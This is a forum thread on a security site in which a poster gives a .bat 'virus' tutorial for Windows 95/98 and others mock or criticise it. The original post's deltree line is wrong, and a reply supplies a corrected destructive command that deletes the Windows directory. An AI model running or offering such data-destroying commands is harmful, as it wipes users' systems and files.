Page 1 of 2 12 LastLast

Thread: .BAT tutorial

Post .BAT tutorial

Note: Do not use the following tutorial for destructive, malicious, or down right bad-purposes. I am not responsible for your actions.

Many crackers write there virii using .bat files which can do some major damage for those of you who use Windows 95 or 98. The following .bat code is the code to delete windows and other important settings/files on your computer. Windows XP requires different code for this type of virus and is more difficult to write.

.bat files are executed through DOS (Disk Operating System)
    You can use virtually any command you use in DOS for Batch programs.
    To write Batch programs for Windows 95/98, all you need is access to Notepad and MS-DOS.

I.
    First we will begin with the echo, clear, and pause commands:
    1.Open notepad
    2. Type:

echo off -this will turn off the c://windows/whatever thing
    cls -clears the screen
    echo I promise I will not use this tutorial for destructive/malicious purposes. -displays that message
    pause -pauses the screen until you press Enter

3. Now save the program as First.bat
    4.Open MS-DOS
    5.Open First.bat from MS-DOS
    6. Voila!

II.
    Now for the deltree commands:

1.Open notepad
    2.Type:

echo off -this will turn off the c://windows/whatever thing
    cls -clears the screen
    deltree y/ win.com -this command deletes windows and all of its components
    echo HaHa
    pause

3. If you are running Windows 95/98, DO NOT EXECUTE THIS PROGRAM! YOU WILL BE SORRY YOU EVER DID1!

OK, I think you get the idea that pretty much you can destroy some poor guys computer (which I know you won't). It would be a waste of time because it takes a long, long, long time to delete everything in windows. There is code to speed up the process, but I am not going to tell you, sorry; use google to help you find the code.

This tutorial was written to help others understand virii a little better and hopefully it will enlighten and educate them more about crackers and why not to become one.

My source: Lame Industries

Extra reminder: The deltree /y command should never be used against anyone else.

For those who are going to flame me: I am a uberhacker not a black hat, not a cracker, nor a lamer. I have never used any .bat file that includes the del or deltree command and don't plan to. I wrote this for pure educational purposes.

By the way, more tuts. to come
    I read somewhere you shouldn\'t always believe what you read so what the Hell am I supposed to do?

deltree y/ win.com this command deletes windows and all of its components .
    Eh.. no it doesnt. All it does is delete the single file win.com. If you changed the y/ to /y. Anyone with any clue could easily restore this file from their windows cd. deltree /y c:\windows\ is the command you are looking for. Hope this helps your uberhacker ambitions.

Im editing this post now. Reading back on it I realise you must be taking the piss. (I hope you are). If you are, ok, you got me. If you arent taking the piss I look forward to chatting to you in Yahoo's Hackers lounge (Where the leet meet )

That is what I meant I just forgot to include the c:/windows... command because, yes your right I needed to take a piss and I was typing as fast as I could. Thanks for correcting me though, I will edit the post.
    I read somewhere you shouldn\'t always believe what you read so what the Hell am I supposed to do?

Search AO and you will find more interesting tutorials on the .bat subject.

Im sorry to say but the above example is not 100% correct and imo a bad example. The example of deleting windows is imo not good. Its maybe me who has a bad day but could you not have given a more constructive example instead of destructive ?

For example show how to use a .bat to catch viiri and/or trojans and then delete them. You could then have used your above "delete" commands in a good way. Use your imagination and Im sure you will find lots of more and far better ways to use your skills .

~micael

let others use their imagination, i am just here to show them how to use the skill. And I can cover a pile of **** with nice clothes, perfume, and makeup and it will still be a pile of ****. How I use examples isn't going to make the deltree concept any different.
    Also like I said

:" This tutorial was written to help others understand virii a little better and hopefully it will enlighten and educate them more about crackers and why not to become one."

if you also want to write to a file it should look something like this

echo yourtexthere > text.txt (or any other filename)

and to add to another line after that:

echo yourtexthere >> text.txt

note: ">" creates a new file, ">>" adds to an existing file
    i dont know really what the official use of this is but it can come in handy for creating log files
    --=::[ LeNc}{ ]::=-- stealing your time for pathetic web sites since 1998

Banned
    God.... Why did you bring the C&P bullcrap here?
    I wonder how long it took you to figuer out this amazeing lamer trick....

Grow up & stop wasteing time. This is a security site.... if you want to teach peaple who are more computer illiterate than yourself then go to another board. Besides calling someone who creates a batch file then calls it virii a "cracker" would be offending to many criminals who have more brains than you will ever have.

I am a uberhacker
    I am now laughing so hard a quantity of urine is running down my leg.

Seriously.
    \"Now it\'s time to erase the story of our bogus fate. Our history as it\'s portrayed is just a recipe for hate!\"
    -Bad Religion

Banned
    Go back to pre-school, kid....

Did you think that when peaple say this site is pure security related that we were jokeing? The very fact that you think that makeing batch files is so.. "AMAZEING" clearly says that you know nothing about PCs and you probably never will.

hey man lay off i didnt see ne of the posts after that first one just addin 2 it that might be helpful dats all
    geez
    --=::[ LeNc}{ ]::=-- stealing your time for pathetic web sites since 1998